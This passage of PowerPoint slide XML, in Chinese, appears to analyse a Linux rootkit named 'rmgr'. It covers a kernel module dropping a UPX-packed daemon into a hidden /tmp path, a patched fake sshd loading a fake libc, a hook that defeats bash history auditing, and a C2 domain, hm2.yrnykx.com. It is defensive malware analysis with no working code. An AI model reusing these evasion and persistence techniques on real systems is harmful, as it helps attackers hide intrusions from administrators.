              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{545E8035-19CB-4A14-A298-9D28B527C036}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> 2. rmgr__fake_libc.so</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4EE8169-3296-4F09-8F3B-A5665C5FEB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482" y="3877411"/>
            <a:ext cx="7793036" cy="2124592"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="324147106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EB10E04-393F-402A-9CF1-F6BAA31A99EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="475937" y="1509194"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>fake_bash_add_history</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>则让</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>bash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>命令审计功能失效。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{545E8035-19CB-4A14-A298-9D28B527C036}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> 2. rmgr__fake_libc.so</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7389940A-29F8-4C41-93C3-0A8A27B54F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7949" y="2482901"/>
            <a:ext cx="7330114" cy="4114799"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="265329563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EB10E04-393F-402A-9CF1-F6BAA31A99EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="475937" y="1509194"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>此进程由</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>rmgr.ko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>释放写入磁盘，路径为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>_{21</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>个随机字母数字</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>。由</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>C++</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>开发，编译后</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>upx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>加壳压缩，直接用开源软件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>upx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> -d </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>rmgr_daemon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>即可脱壳，并无特殊处理。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{545E8035-19CB-4A14-A298-9D28B527C036}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>rmgr_daemon</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="364057639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EB10E04-393F-402A-9CF1-F6BAA31A99EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="475937" y="1509194"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>监控内核模块状态，与内核</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>rootkit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>信息交互</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{545E8035-19CB-4A14-A298-9D28B527C036}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>rmgr_daemon</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C61E8E5-3E3C-4546-A0A8-4B66EE3B50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2046" y="2821507"/>
            <a:ext cx="6162675" cy="2679883"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28059095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EB10E04-393F-402A-9CF1-F6BAA31A99EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="475937" y="1509194"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>更新</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{545E8035-19CB-4A14-A298-9D28B527C036}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>rmgr_daemon</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F771153-5F82-4176-9DF6-E8057D20E4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938" y="2695419"/>
            <a:ext cx="6429375" cy="2548456"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="174954958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EB10E04-393F-402A-9CF1-F6BAA31A99EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="275912" y="1524185"/>
            <a:ext cx="8668063" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>生成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>rmgr_fake_sshd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，并</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>patchELF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，修改依赖的动态库，也就是加入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>rmgr_fake_libc.so</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{545E8035-19CB-4A14-A298-9D28B527C036}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>rmgr_daemon</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4798707D-2013-43E9-AD30-6830BD3B17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342" y="2581197"/>
            <a:ext cx="4904048" cy="2875223"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F46C8EF1-2B1A-47C5-A432-2C2D84371CF7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4293043" y="3158038"/>
            <a:ext cx="4248150" cy="2914650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC3E7416-6F87-4BCF-8E2E-4D8A852C1086}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="2581197"/>
            <a:ext cx="8839200" cy="3686175"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="283393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1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w*0.70"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="1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EB10E04-393F-402A-9CF1-F6BAA31A99EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="275912" y="1524185"/>
            <a:ext cx="8668063" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>4) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>连接</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>C2 hm2.yrnykx.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>5) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>管理</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>rmgr_fake_sshd</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{545E8035-19CB-4A14-A298-9D28B527C036}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>rmgr_daemon</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75050C38-4DC5-49BA-817F-EEDB47AFB0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612" y="2035930"/>
            <a:ext cx="6962775" cy="3770683"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13743398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EB10E04-393F-402A-9CF1-F6BAA31A99EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="275912" y="1524185"/>
            <a:ext cx="8668063" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文件由</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>rmgr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" i="1" dirty="0" err="1"/>
              <a:t>daemon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" i="1" dirty="0"/>
              <a:t>写入磁盘，路径为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" i="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" i="1" dirty="0" err="1"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" i="1" dirty="0"/>
              <a:t>/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" i="1" dirty="0" err="1"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>{21</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>个随机字母数字</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，它的运行均由</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>rmgr_daemon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>管理</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
